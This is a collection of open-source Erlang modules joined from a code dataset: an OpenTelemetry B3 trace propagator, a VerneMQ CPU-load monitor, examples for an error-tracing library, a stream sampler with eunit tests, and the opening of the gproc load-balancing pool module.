?assertEqual(1, tree_height(#leaf{})),
ok.
count_test() ->
HashFun = fun hash_value/1,
Tree0 = new(),
?assertEqual(0, count(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, HashFun, Acc)
end,
new(),
lists:seq(1, 10)
),
?assertEqual(10, count(Tree1)),
ok.
-endif. | src/skewed.erl | 0.732783 | 0.634855 | skewed.erl | starcoder |
%%%------------------------------------------------------------------------
%% Copyright 2019, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc An implementation of {@link otel_propagator_text_map} that injects and
%% extracts trace context using the B3 specification from Zipkin.
%%
%% Since `trace_context' and `baggage' are the two default propagators the
%% global TextMap Propagators must be configured if B3 is to be used for
%% propagation:
%%
%% ```
%% {text_map_propagators, [b3multi, baggage]},
%% '''
%%
%% ```
%% CompositePropagator = otel_propagator_text_map_composite:create([b3multi, baggage]),
%% opentelemetry:set_text_map_propagator(CompositePropagator).
%% '''
%%
%% It is also possible to set a separate list of injectors or extractors.
%% For example, if the service should extract B3 encoded context but you
%% only want to inject context encoded with the W3C TraceContext format
%% (maybe you have some services only supporting B3 that are making requests
%% to your server but you have no reason to continue propagating in both
%% formats when communicating to other services further down the stack).
%% In that case you would instead set configuration like:
%%
%%
%% ```
%% {text_map_extractors, [b3multi, trace_context, baggage]},
%% {text_map_injectors, [trace_context, baggage]},
%% '''
%%
%% Or using calls to {@link opentelemetry} at runtime:
%%
%% ```
%% B3CompositePropagator = otel_propagator_text_map_composite:create([b3multi, trace_context, baggage]),
%% CompositePropagator = otel_propagator_text_map_composite:create([trace_context, baggage]),
%% opentelemetry:set_text_map_extractor(B3CompositePropagator),
%% opentelemetry:set_text_map_injector(CompositePropagator).
%% '''
%% @end
%%%-----------------------------------------------------------------------
-module(otel_propagator_b3multi).
-behaviour(otel_propagator_text_map).
-export([fields/1,
inject/4,
extract/5]).
-include("opentelemetry.hrl").
-define(B3_TRACE_ID, <<"X-B3-TraceId">>).
-define(B3_SPAN_ID, <<"X-B3-SpanId">>).
-define(B3_SAMPLED, <<"X-B3-Sampled">>).
-define(B3_IS_SAMPLED(S), S =:= "1" orelse S =:= <<"1">> orelse S =:= "true" orelse S =:= <<"true">>).
fields(_) ->
[?B3_TRACE_ID, ?B3_SPAN_ID, ?B3_SAMPLED].
-spec inject(Context, Carrier, CarrierSetFun, Options) -> Carrier
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierSetFun :: otel_propagator_text_map:carrier_set(),
Options :: otel_propagator_text_map:propagator_options().
inject(Ctx, Carrier, CarrierSet, _Options) ->
case otel_tracer:current_span_ctx(Ctx) of
#span_ctx{trace_id=TraceId,
span_id=SpanId,
trace_flags=TraceOptions} when TraceId =/= 0 andalso SpanId =/= 0 ->
Options = case TraceOptions band 1 of 1 -> <<"1">>; _ -> <<"0">> end,
EncodedTraceId = io_lib:format("~32.16.0b", [TraceId]),
EncodedSpanId = io_lib:format("~16.16.0b", [SpanId]),
CarrierSet(?B3_TRACE_ID, iolist_to_binary(EncodedTraceId),
CarrierSet(?B3_SPAN_ID, iolist_to_binary(EncodedSpanId),
CarrierSet(?B3_SAMPLED, Options, Carrier)));
_ ->
Carrier
end.
-spec extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Options) -> Context
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierKeysFun :: otel_propagator_text_map:carrier_keys(),
CarrierGetFun :: otel_propagator_text_map:carrier_get(),
Options :: otel_propagator_text_map:propagator_options().
extract(Ctx, Carrier, _CarrierKeysFun, CarrierGet, _Options) ->
try
TraceId = trace_id(Carrier, CarrierGet),
SpanId = span_id(Carrier, CarrierGet),
Sampled = CarrierGet(?B3_SAMPLED, Carrier),
SpanCtx =
otel_tracer:from_remote_span(string_to_integer(TraceId, 16),
string_to_integer(SpanId, 16),
case Sampled of True when ?B3_IS_SAMPLED(True) -> 1; _ -> 0 end),
otel_tracer:set_current_span(Ctx, SpanCtx)
catch
throw:invalid ->
Ctx;
%% thrown if _to_integer fails
error:badarg ->
Ctx
end.
trace_id(Carrier, CarrierGet) ->
case CarrierGet(?B3_TRACE_ID, Carrier) of
TraceId when is_list(TraceId) orelse is_binary(TraceId) ->
case string:length(TraceId) =:= 32 orelse string:length(TraceId) =:= 16 of
true ->
TraceId;
_ ->
throw(invalid)
end;
_ ->
throw(invalid)
end.
span_id(Carrier, CarrierGet) ->
case CarrierGet(?B3_SPAN_ID, Carrier) of
SpanId when is_list(SpanId) orelse is_binary(SpanId) ->
case string:length(SpanId) =:= 16 of
true ->
SpanId;
_ ->
throw(invalid)
end;
_ ->
throw(invalid)
end.
string_to_integer(S, Base) when is_binary(S) ->
binary_to_integer(S, Base);
string_to_integer(S, Base) when is_list(S) ->
list_to_integer(S, Base). | apps/opentelemetry_api/src/otel_propagator_b3multi.erl | 0.697918 | 0.548794 | otel_propagator_b3multi.erl | starcoder |
%% Copyright 2014 Erlio GmbH Basel Switzerland (http://erl.io)
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(vmq_sysmon).
-behaviour(gen_server).
%% API
-export([start_link/0,
cpu_load_level/0]).
%% gen_server callbacks
-export([init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3]).
-record(state, {samples=queue:new()}).
-define(SAMPLE_INTERVAL, 2000).
-define(NR_OF_SAMPLES, 10).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the server
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
start_link() ->
gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).
cpu_load_level() ->
[{_, Level}] = ets:lookup(?MODULE, cpu_load_level),
Level.
%%%===================================================================
%%% gen_server callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Initializes the server
%%
%% @spec init(Args) -> {ok, State} |
%% {ok, State, Timeout} |
%% ignore |
%% {stop, Reason}
%% @end
%%--------------------------------------------------------------------
init([]) ->
_ = cpu_sup:util([per_cpu]), % first return value is rubbish, per the docs
_ = ets:new(?MODULE, [public, named_table, {read_concurrency, true}]),
%% Add our system_monitor event handler. We do that here because
%% we have a process at our disposal (i.e. ourself) to receive the
%% notification in the very unlikely event that the
%% riak_core_sysmon_handler has crashed and been removed from the
%% riak_sysmon_handler gen_event server. (If we had a supervisor
%% or app-starting process add the handler, then if the handler
%% crashes, nobody will act on the crash notification.)
vmq_sysmon_handler:add_handler(),
{ok, #state{}, 0}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling call messages
%%
%% @spec handle_call(Request, From, State) ->
%% {reply, Reply, State} |
%% {reply, Reply, State, Timeout} |
%% {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, Reply, State} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_call(_Request, _From, State) ->
Reply = ok,
{reply, Reply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling cast messages
%%
%% @spec handle_cast(Msg, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_cast(_Msg, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling all non call/cast messages
%%
%% @spec handle_info(Info, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_info(timeout, #state{samples=Samples} = State) ->
CPUAvg = cpu_sample(),
NewSamples =
case queue:len(Samples) of
L when L >= ?NR_OF_SAMPLES ->
queue:in(CPUAvg, queue:drop(Samples));
_ ->
queue:in(CPUAvg, Samples)
end,
Level = calc(NewSamples),
ets:insert(?MODULE, {cpu_load_level, Level}),
{noreply, State#state{samples=NewSamples}, ?SAMPLE_INTERVAL};
handle_info({gen_event_EXIT, riak_core_sysmon_handler, _}, State) ->
%% SASL will create an error message, no need for us to duplicate it.
%%
%% Our handler should never crash, but it did indeed crash. If
%% there's a pathological condition somewhere that's generating
%% lots of unforseen things that crash core's custom handler, we
%% could make things worse by jumping back into the exploding
%% volcano. Wait a little bit before jumping back. Besides, the
%% system_monitor data is nice but is not critical: there is no
%% need to make things worse if things are indeed bad, and if we
%% miss a few seconds of system_monitor events, the world will not
%% end.
timer:sleep(2000),
vmq_sysmon_handler:add_handler(),
{noreply, State};
handle_info(_Info, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by a gen_server when it is about to
%% terminate. It should be the opposite of Module:init/1 and do any
%% necessary cleaning up. When it returns, the gen_server terminates
%% with Reason. The return value is ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(_Reason, _State) ->
ok.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Convert process state when code is changed
%%
%% @spec code_change(OldVsn, State, Extra) -> {ok, NewState}
%% @end
%%--------------------------------------------------------------------
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%===================================================================
%%% Internal functions
%%%===================================================================
calc(Samples) ->
case queue:peek_r(Samples) of
{value, Sample} when Sample >= 100 -> 3;
{value, Sample} when Sample >= 90 -> 2;
{value, Sample} when Sample >= 80 -> 1;
_ -> 0 % includes queue is empty
end.
cpu_sample() ->
case cpu_sup:util([per_cpu]) of
Info when is_list(Info) ->
Utils = [U || {_, U, _, _} <- Info],
case Utils of
[U] ->
%% only one cpu
U;
[_, _|_] ->
%% This is a form of ad-hoc averaging, which tries to
%% account for the possibility that the application
%% loads the cores unevenly.
calc_avg_util(Utils)
end;
_ ->
undefined
end.
calc_avg_util(Utils) ->
case minmax(Utils) of
{A, B} when B-A > 50 ->
%% very uneven load
High = [U || U <- Utils,
B - U > 20],
lists:sum(High) / length(High);
{Low, High} ->
(High + Low) / 2
end.
minmax([H | T]) ->
lists:foldl(
fun(X, {Min, Max}) ->
{erlang:min(X, Min), erlang:max(X, Max)}
end, {H, H}, T). | apps/vmq_server/src/vmq_sysmon.erl | 0.54359 | 0.423547 | vmq_sysmon.erl | starcoder |
-module(tracke_example).
-include("tracke.hrl").
-compile([{parse_transform, tracke_pt}]).
-export([normal_usage/1,
merge_error_types/1,
deep_chain/0]).
-type tracke(Reason) :: tracke:tracke(Reason).
%% @doc Show you normal usage of tracke.
%% You can see the results on shell using the following codes:
%% tracke_example:normal_usage(0).
%% tracke_example:normal_usage(-100).
%% tracke_example:normal_usage(127).
%% tracke_example:normal_usage(15).
-spec normal_usage(integer()) -> ok.
normal_usage(X) ->
case func1(X) of
{ok, V} ->
io:format("Ok: ~p~n", [V]);
{error, Reason} ->
io:format("~s~n", [tracke:format(Reason)]),
case tracke:reason(Reason) of
zero ->
io:format("Your input is zero.~n", []);
negative ->
io:format("Your input is negative.~n", []);
boring_number ->
io:format("Your input is boring.~n", [])
end
end,
ok.
-spec func1(integer()) -> {ok, binary()} | {error, tracke(zero | negative | boring_number)}.
func1(0) ->
{error, tracke:new(zero)};
func1(X) when X < 0 ->
{error, tracke:new(negative)};
func1(X) ->
case fizzbuzz(X) of
{ok, _} = Ok ->
Ok;
{error, Reason} ->
{error, tracke:chain(Reason)}
end.
-spec fizzbuzz(integer()) -> {ok, binary()} | {error, tracke(boring_number)}.
fizzbuzz(X) ->
case {X rem 5 =:= 0, X rem 3 =:= 0} of
{true, true} ->
{ok, <<"fizzbuzz">>};
{true, false} ->
{ok, <<"fizz">>};
{false, true} ->
{ok, <<"buzz">>};
{false, false} ->
{error, tracke:new(boring_number)}
end.
%% @doc Create new type from different `tracke/1' types.
%% You can see the results on shell using the following codes:
%% tracke_example:merge_error_types(foo).
%% tracke_example:merge_error_types(bar).
-spec merge_error_types(foo | bar) -> ok.
merge_error_types(Atom) ->
case error_func1(Atom) of
{error, Reason} ->
case tracke:reason(Reason) of
% not_exist ->
% Dialyzer causes an error here.
% io:format("~s~n", [tracke:format(Reason)]);
aaa ->
io:format("~s~n", [tracke:format(Reason)]);
bbb ->
io:format("~s~n", [tracke:format(Reason)])
end
end,
ok.
-spec error_func1(foo | bar) -> {error, tracke(aaa | bbb)}.
error_func1(X) ->
case X of
foo ->
error_func2();
bar ->
error_func3()
end.
-spec error_func2() -> {error, tracke(aaa)}.
error_func2() ->
{error, tracke:new(aaa)}.
-spec error_func3() -> {error, tracke(bbb)}.
error_func3() ->
{error, tracke:new(bbb)}.
%% @doc Create deep chained `tracke()'.
%% You can see the results on shell using the following codes:
%% tracke_example:deep_chain().
-spec deep_chain() -> ok.
deep_chain() ->
case deep_chain3(x, y, z) of
{error, Reason} ->
io:format("~s~n", [tracke:format(Reason)])
end,
ok.
-spec deep_chain1(x) -> {error, tracke(bottom_reason)}.
deep_chain1(_) ->
{error, tracke:new(bottom_reason)}.
-spec deep_chain2(x, y) -> {error, tracke(bottom_reason)}.
deep_chain2(x, y) ->
case deep_chain1(x) of
{error, Reason} ->
{error, tracke:chain(Reason, "hi")}
end.
-spec deep_chain3(x, y, z) -> {error, tracke(bottom_reason)}.
deep_chain3(x, y, z) ->
case deep_chain2(x, y) of
{error, Reason} ->
{error, tracke:chain(Reason)}
end. | src/tracke_example.erl | 0.597373 | 0.500916 | tracke_example.erl | starcoder |
%% -*- coding: utf-8 -*-
%% @private
-module(ds_sampler).
-author("<NAME> <<EMAIL>>").
%% Statistically representative stream sampler
%% See chapter 4.2. Sampling data in a stream
%% in Mining of Massive Datasets, Second Edition, 2014
%% by <NAME>, <NAME> and <NAME>
-export([ new/1
, add/2
, add_hash/2
, join/2
, get_samples/1
, get_size/1
]).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-record(sampler,
{ capacity % The maximum number of samples to store
, size % Number of currently stored samples
, tree % gb_trees structure of samples
, max_hash % Current upper limit on hash value
}).
%% Initialize a sampler with given capacity.
new(false) -> undefined;
new(Capacity) when is_integer(Capacity), Capacity > 0;
Capacity =:= infinity ->
#sampler{capacity = Capacity,
size = 0,
tree = gb_trees:empty(),
max_hash = 0};
new(T) ->
error(badarg, [T]).
%% Add a value with attributes to the sampler.
%% Attributes are passed to the per-value statistics module
%% that maintains stats for each sampled value.
add(_VA, undefined) -> undefined;
add({V, A}, Sampler) ->
Hash = ds_utils:hash(V),
add_hash({Hash, {V, A}}, Sampler).
%% The sampler algorithm requires a hash that maps to 32-bit words.
%% This function is provided as an entry point in case you have already
%% hashed your terms with a suitable function and want to spare another
%% hash computation. In this case, please make sure to use a suitable
%% hash function (ds_utils:hash/1 is strongly recommended)!
%% In case of doubt, just use add/2 above.
add_hash(_Data, undefined) -> undefined;
add_hash({Hash, {V, A}}, #sampler{capacity = Capacity,
size = Size0, tree=Tree0,
max_hash = MaxHash0} = Sampler)
when Size0 < Capacity ->
{Tree, Size} = update_tree(Hash, {V, A}, Tree0, Size0),
MaxHash = max(Hash, MaxHash0),
Sampler#sampler{size = Size, max_hash = MaxHash, tree = Tree};
add_hash({Hash, {_V,_A}}, #sampler{max_hash = MaxHash} = Sampler)
when Hash > MaxHash ->
Sampler;
add_hash({Hash, {V, A}}, #sampler{capacity = Capacity,
size = Size0, tree = Tree0} = Sampler) ->
{Tree1, Size1} = update_tree(Hash, {V, A}, Tree0, Size0),
if Size1 > Capacity ->
{_, Value, Tree} = gb_trees:take_largest(Tree1),
Size = case Value of
{_Vmax,_PV} -> Size1 - 1;
Bucket -> Size1 - length(Bucket)
end,
{MaxHash, _} = gb_trees:largest(Tree),
Sampler#sampler{size = Size, max_hash = MaxHash, tree = Tree};
true ->
Sampler#sampler{size = Size1, tree = Tree1}
end.
update_tree(Hash, {V, A}, Tree0, Size0) ->
case gb_trees:lookup(Hash, Tree0) of
none ->
PV = ds_pvattrs:new(A),
{gb_trees:insert(Hash, {V, PV}, Tree0), Size0 + 1};
{value, {V, PV0}} ->
PV = ds_pvattrs:add(A, PV0),
{gb_trees:update(Hash, {V, PV}, Tree0), Size0};
{value, {V1, PV1}} ->
%% hash collision with another single value, convert to list bucket
PV = ds_pvattrs:new(A),
Bucket = [{V, PV}, {V1, PV1}],
{gb_trees:update(Hash, Bucket, Tree0), Size0 + 1};
{value, Bucket0} ->
%% collision occurred earlier on this hash
{Bucket, Size} = update_bucket(Bucket0, {V, A}, Size0),
{gb_trees:update(Hash, Bucket, Tree0), Size}
end.
update_bucket(Bucket, {V, A}, Size) ->
case lists:keyfind(V, 1, Bucket) of
false ->
{[{V, ds_pvattrs:new(A)} | Bucket], Size + 1};
{V, PV0} ->
PV = ds_pvattrs:add(A, PV0),
{lists:keystore(V, 1, Bucket, {V, PV}), Size}
end.
%% The capacity of the joined sampler will be the maximum of the two.
join(undefined, Sampler) -> Sampler;
join(Sampler, undefined) -> Sampler;
join(#sampler{capacity = Capacity1} = Sampler1,
#sampler{capacity = Capacity2} = Sampler2) when Capacity2 > Capacity1 ->
join(Sampler2, Sampler1);
join(Sampler1, #sampler{tree = Tree2}) ->
lists:foldl(fun({_Hash, {_V,_A}}=Data, Sampler) ->
add_hash(Data, Sampler);
({Hash, Bucket}, Sampler) when is_list(Bucket) ->
lists:foldl(fun(VA, Acc) ->
add_hash({Hash, VA}, Acc)
end, Sampler, Bucket)
end, Sampler1, gb_trees:to_list(Tree2)).
%% Return a list of {V, PV}
get_samples(undefined) -> [];
get_samples(#sampler{tree = Tree}) -> lists:flatten(gb_trees:values(Tree)).
%% Return the number of unique values sampled
get_size(undefined) -> 0;
get_size(#sampler{size = Size}) -> Size.
%% Tests
-ifdef(TEST).
%%-define(DEBUG, true).
-ifdef(DEBUG).
print(#sampler{capacity = Capacity, size = Size, tree = Tree,
max_hash = MaxHash}, Name) ->
io:format(user,
"~nSampler ~s with capacity=~B, size=~B, max_hash=~B~n"
"sampled values with per-value stats:~n~n",
[Name, Capacity, Size, MaxHash]),
[io:format(user, "~10B: ~6w ~p~n", [Hash, V, PV])
|| {Hash, {V, PV}} <- gb_trees:to_list(Tree)],
ok.
-define(print(Sampler), print(Sampler, ??Sampler)).
-else.
-define(print(Sampler), ok).
-endif.
%% Use a weaker hash function when testing collisions.
ctadd(_VA, undefined) -> undefined;
ctadd({V, A}, Sampler) ->
Hash = erlang:phash2(V, 1 bsl 32),
add_hash({Hash, {V, A}}, Sampler).
new_test() ->
?assertError(badarg, new(0)),
?assertError(badarg, new(nan)),
?assertEqual(#sampler{capacity = 10, size = 0,
max_hash = 0, tree = gb_trees:empty()},
new(10)).
sampler_test() ->
S = lists:foldl(fun add/2, new(50),
[{N, []} || N <- lists:seq(0, 9999)]),
?print(S),
Hist = lists:foldl(fun(N, Acc) ->
orddict:update_counter(N div 100, 1, Acc)
end, orddict:new(), [N || {N, _PV} <- get_samples(S)]),
%% assert some level of uniformity
?assert(length(Hist) > 35),
?assert(lists:max([Count || {_Bin, Count} <- Hist]) =< 4),
ok.
collisions_test() ->
NonColliders = lists:seq(0, 9999),
Colliders =
%% Each row contains numbers that hash to the same value.
[ 22722, 266086
, 26544, 217817
, 33702, 44741
, 38988, 125056
, 47282, 81624
, 125915, 283130
, 300486, 879671
, 302126, 905421
, 302781, 868970
, 302800, 362107
%% triple collisions:
, 70024, 1918936, 4696183
, 1074149, 2805927, 9580072
, 1190377, 1534289, 6156731
, 1235514, 4795238, 6886479
, 2378846, 3760671, 5137463
, 2671427, 7709636, 8682435
, 3635546, 5201779, 5527149
, 4604703, 4879230, 9248585
, 5557231, 5988521, 6524388
, 6161979, 6660282, 7669964
],
S0 = lists:foldl(fun ctadd/2, new(infinity), [{N, []} || N <- NonColliders]),
S1 = lists:foldl(fun ctadd/2, S0, [{N, []} || N <- Colliders]),
SampleCount = length(NonColliders) + length(Colliders),
?assertEqual(SampleCount, length(get_samples(S1))),
SampleValues = lists:sort(Colliders ++ NonColliders),
?assertEqual(SampleValues, [V || {V,_PV} <- lists:sort(get_samples(S1))]).
duplicates_test() ->
Sd = lists:foldl(fun add/2, new(10),
[{N rem 25, [{key, N}]} || N <- lists:seq(0, 9999)]),
?print(Sd),
Counts = [ds_pvattrs:get_count(PV) || {_N, PV} <- get_samples(Sd)],
?assertEqual(10, length(Counts)),
[?assertEqual(400, Count) || Count <- Counts].
join_test() ->
S1 = lists:foldl(fun add/2, new(8),
[{N, [{ts, 10*N}]} || N <- lists:seq(0, 999)]),
?print(S1),
S2 = lists:foldl(fun add/2, new(24),
[{N, [{key, N}]} || N <- lists:seq(1000, 1999)]),
?print(S2),
Sj1 = join(S1, S2),
%% verify that the joined set contains samples from both S1 and S2
{JoinedFromS1, JoinedFromS2} =
lists:partition(fun({V,_PV}) -> V < 1000 end, get_samples(Sj1)),
?assert(length(JoinedFromS1) > 0),
?assert(length(JoinedFromS2) > 0),
?print(Sj1),
Sj2 = join(S1, Sj1),
%% verify that items from S1 have count 2 in Sj2
CountsFromS1 =
[ds_pvattrs:get_count(PV) || {N, PV} <- get_samples(Sj2), N < 1000],
[?assertEqual(2, Count) || Count <- CountsFromS1],
?print(Sj2).
join_with_collisions_test() ->
L1 = [ % collide with self
22722, 266086
, 26544, 217817
, 33702, 44741
, 38988, 125056
% collide with L2
, 302781
, 302800
, 70024, 1918936
, 1074149, 2805927
],
L2 = [ % collide with self
47282, 81624
, 125915, 283130
, 300486, 879671
, 302126, 905421
% collide with L1
, 868970
, 362107
, 1918936, 4696183
, 2805927, 9580072
],
%% we want all samples to fit into one sampler
TotalCap = length(L1) + length(L2),
S1 = lists:foldl(fun ctadd/2, new(TotalCap), [{N, []} || N <- L1]),
?print(S1),
S2 = lists:foldl(fun ctadd/2, new(TotalCap), [{N, []} || N <- L2]),
?print(S2),
Sj = join(S1, S2),
?print(Sj),
RefSamples = lists:usort(L1 ++ L2),
JoinedSamples = get_samples(Sj),
?assertEqual(length(RefSamples), length(JoinedSamples)),
?assertEqual(RefSamples, lists:sort([V || {V,_PV} <- JoinedSamples])).
-endif. | src/ds_sampler.erl | 0.521471 | 0.418994 | ds_sampler.erl | starcoder |
%% ``The contents of this file are subject to the Erlang Public License,
%% Version 1.1, (the "License"); you may not use this file except in
%% compliance with the License. You should have received a copy of the
%% Erlang Public License along with this software. If not, it can be
%% retrieved via the world wide web at http://www.erlang.org/.
%%
%% Software distributed under the License is distributed on an "AS IS"
%% basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
%% the License for the specific language governing rights and limitations
%% under the License.
%%
%% The Initial Developer of the Original Code is Ericsson Utvecklings AB.
%% Portions created by Ericsson are Copyright 1999, Ericsson Utvecklings
%% AB. All Rights Reserved.''
%%
%% @author <NAME> <<EMAIL>>
%%
%% @doc Load balancing functions based on Gproc.
%%
%% This module implements support for load-balancing server pools. It was
%% originally intended mainly as an example of how to use various Gproc
%% resources (e.g. counters and shared properties), but is fully integrated
%% into Gproc, and fully functional.
%%
%% <h2>Concepts</h2>
%%
%% Each pool has a list of 'named' workers (defined using `add_worker/2') and
%% a load-balancing strategy. Processes can then 'connect' to the pool (with
%% `connect_worker/2'), using one of the defined names.
%%
%% Users then 'pick' one of the currently connected processes in the pool. Which
%% process is picked depends on the load-balancing strategy.
%%
%% The whole representation of the pool and its connected workers is in gproc.
%% The server `gproc_pool' is used to serialize pool management updates, but
%% worker selection is performed entirely in the calling process, and can be
%% performed by several processes concurrently.
%%
%% <h3>Load-balancing strategies</h3>
%%
%% * `round_robin' is the default. A wrapping gproc counter keeps track of the
%% latest worker picked, and `gproc:next()' is used to find the next worker.
%% * `random' picks a random worker from the pool.
%% * `hash' requires a value (`pick/2'), and picks a worker based on the hash of
%% that value.
%% * `direct' takes an integer as an argument, and picks the next worker (modulo
%% the size of the pool). This is mainly for implementations that implement
%% a load-balancing strategy on top of `gproc_pool'.
%% * `claim' picks the first available worker and 'claims' it while executing
%% a user-provided fun. This means that the number of concurrently executing
%% jobs will not exceed the size of the pool.
%% @end
-module(gproc_pool).
-behavior(gen_server).
%% gproc round-robin name lookup
-export([new/1, % (Pool) -> (Pool, round_robin, [])
new/3, % (Pool, Type, Opts)
delete/1, % (Pool)
force_delete/1, % (Pool)
add_worker/2, % (Pool, Name) -> Pos
add_worker/3, % (Pool, Name, Pos) -> Pos
remove_worker/2, % (Pool, Name)
connect_worker/2, % (Pool, Name)
disconnect_worker/2, % (Pool, Name)
whereis_worker/2, % (Pool, Name)
worker_id/2, % (Pool, Name)
active_workers/1, % (Pool)
defined_workers/1, % (Pool)
worker_pool/1, % (Pool)
pick/1, % (Pool)
pick/2, % (Pool, Value)
pick_worker/1, % (Pool)
pick_worker/2, % (Pool, Value)
claim/2, % (Pool, Fun)
claim/3, % (Pool, Fun, Wait)
log/1, % (WorkerId)
randomize/1]). % (Pool)
-export([start_link/0]).
-export([init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3]).
-export([test/1, test/3, ptest/4, test_run/2, test_run1/2, test_run2/2,
test_run0/2, setup_test_pool/3, setup_test_pool/4,
remove_test_pool/1]).
-define(POOL(Pool), {p,l,{?MODULE,Pool}}).
-define(POOL_CUR(Pool), {c,l,{?MODULE,Pool,cur}}).
-define(POOL_WRK(Pool,Name), {c,l,{?MODULE,Pool,w,Name}}).
-record(st, {}).
%% @spec new(Pool::any()) -> ok
%%
%% @equiv new(Pool, round_robin, [])
new(Pool) ->
new(Pool, round_robin, []).
%% @spec new(Pool::any(), Type, Opts) -> true
%% Type = round_robin | random | hash | direct | claim
%% Opts = [{size, integer()} | {auto_size, boolean()}]
%%
%% @doc Create a new pool.
%%
%% The pool starts out empty. If a size is not given, the pool size is set to
%% 0 initially. `auto_size' is `true' by default if size is not specified, but
%% `false' by default otherwise. If `auto_size == true', the pool will be
%% enlarged to accomodate new workers, when necessary. Otherwise, trying to add
%% a worker when the pool is full will raise an exception, as will trying to add
%% a worker on a specific position beyond the current size of the pool.
%%
%% If the given pool already exists, this function will raise an exception.
%% @end
new(Pool, Type, Opts) when Type == round_robin;
Type == random;
Type == hash;
Type == direct;
Type == claim ->
call({new, Pool, Type, Opts}).
%% @spec delete(Pool::any()) -> true
%% @doc Delete an existing pool.
%%
%% This function will delete a pool, only if there are no connected workers.
%% Ensure that workers have been disconnected before deleting the pool.
%% @end
%%
delete(Pool) ->
call({delete, Pool}).
%% @spec force_delete(Pool::any()) -> true
%% @doc Forcibly remove a pool, terminating all active workers
%%
%% This function is primarily intended for cleanup of any pools that might have
%% become inconsistent (for whatever reason). It will clear out all resources
%% belonging to the pool and send `exit(Pid, kill)' signals to all connected
%% workers (except the calling process).
%% @end
%%
force_delete(Pool) ->
%% This is not pretty, but this function is mainly intended to clean up
%% a pool that's not used, with no regard to connected workers, except self(),
%% (that is, we kill each connected worker). We don't worry about races,
%% so don't go to the server (which doesn't have own state on the pool
%% anyway).
force_delete_(Pool).
%% @spec add_worker(Pool::any(), Name::any()) -> integer()
%%
%% @doc Assign a worker name to the pool, returning the worker's position.
%%
%% Before a worker can connect to the pool, its name must be added. If no explicit
%% position is given (see {@link add_worker/3}), the most suitable position,
%% depending on load-balancing algorithm, is selected: for round_robin and direct
%% pools, names are packed tightly from the beginning; for hash and random pools,
%% slots are filled as sparsely as possible, in order to maintain an even
%% likelihood of hitting each worker.
%%
%% An exception is raised if the pool is full (and `auto_size' is false), or if
%% `Name' already exists in the pool.
%%
%% Before a worker can be used, a process must connect to it (see
%% {@link connect_worker/2}.
%% @end
add_worker(Pool, Name) ->
call({add_worker, Pool, Name}).
%% @spec add_worker(Pool::any(), Name::any(), Slot::integer()) -> integer()
%%
%% @doc Assign a worker name to a given slot in the pool, returning the slot.
%%
%% This function allows the pool maintainer to exactly position each worker
%% inside the pool. An exception is raised if the position is already taken,
%% or if `Name' already exists in the pool. If `Slot' is larger than the current
%% size of the pool, an exception is raised iff `auto_size' is `false';
%% otherwise the pool is expanded to accomodate the new position.
%% @end
add_worker(Pool, Name, Slot) ->
call({add_worker, Pool, Name, Slot}).
%% @spec connect_worker(Pool::any(), Name::any()) -> true
%% @doc Connect the current process to `Name' in `Pool'.
%%
%% Typically, a server will call this function as it starts, similarly to when
%% it registers itself. In fact, calling `connect_worker/2' leads to the process
%% being registered as `{n,l,[gproc_pool,N,Name]}', where `N' is the position of
%% `Name' in the pool. This means (a) that gproc monitors the worker, and
%% removes the connection automatically if it dies, and (b) that the registered
%% names can be listed in order of their positions in the pool.
%%
%% This function raises an exception if `Name' does not exist in `Pool' (or
%% there is no such pool), or if another worker is already connected to
%% `Name'.
%% @end
%%
connect_worker(Pool, Name) ->
gproc:reg(worker_id(Pool, Name), 0).
%% @spec disconnect_worker(Pool, Name) -> true
%%
%% @doc Disconnect the current process from `Name' in `Pool'.
%%
%% This function is similar to a `gproc:unreg()' call. It removes the
%% connection between `Pool', `Name' and pid, and makes it possible for another
%% process to connect to `Name'.
%%
%% An exception is raised if there is no prior connection between `Pool',
%% `Name' and the current process.
%% @end
%%
disconnect_worker(Pool, Name) ->
gproc:unreg(worker_id(Pool, Name)).
%% @spec remove_worker(Pool::any(), Name::any()) -> true
